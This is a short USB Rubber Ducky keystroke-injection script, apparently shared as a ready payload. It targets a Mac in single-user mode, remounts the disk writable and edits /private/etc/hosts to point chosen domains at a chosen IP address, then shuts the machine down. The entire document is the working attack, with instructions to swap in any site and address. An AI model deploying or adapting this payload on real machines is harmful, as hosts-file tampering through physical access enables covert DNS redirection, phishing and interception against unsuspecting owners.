* Author - SWISA
* Boot into single user mode and insert ducky. This script will create a local DNS entry in the host file. Change the IP adress and/or url.

 REM SWISA
 REM A script to create a local DNS entry in the host file of a mac.
 REM change the example.com to any site you want.
 REM change the 127.0.0.1 to any ip you want.
 DELAY 1000
 STRING mount -uw /
 ENTER
 DELAY 2000
 ENTER
 STRING nano /private/etc/hosts
 ENTER
 DOWNARROW
 DOWNARROW
 DOWNARROW
 DOWNARROW
 DOWNARROW
 DOWNARROW
 DOWNARROW
 DOWNARROW
 DOWNARROW
 DOWNARROW
 DOWNARROW
 DOWNARROW
 DOWNARROW
 DOWNARROW
 DOWNARROW
 DOWNARROW
 DOWNARROW
 DOWNARROW
 DOWNARROW
 DOWNARROW
 DOWNARROW
 DOWNARROW
 DOWNARROW
 DOWNARROW
 DOWNARROW
 DOWNARROW
 DOWNARROW
 DOWNARROW
 DOWNARROW
 DOWNARROW
 STRING 127.0.0.1 example.com
 ENTER
 STRING 127.0.0.1 www.example.com
 ENTER
 CTRL o
 ENTER
 CTRL x
 STRING shutdown -h now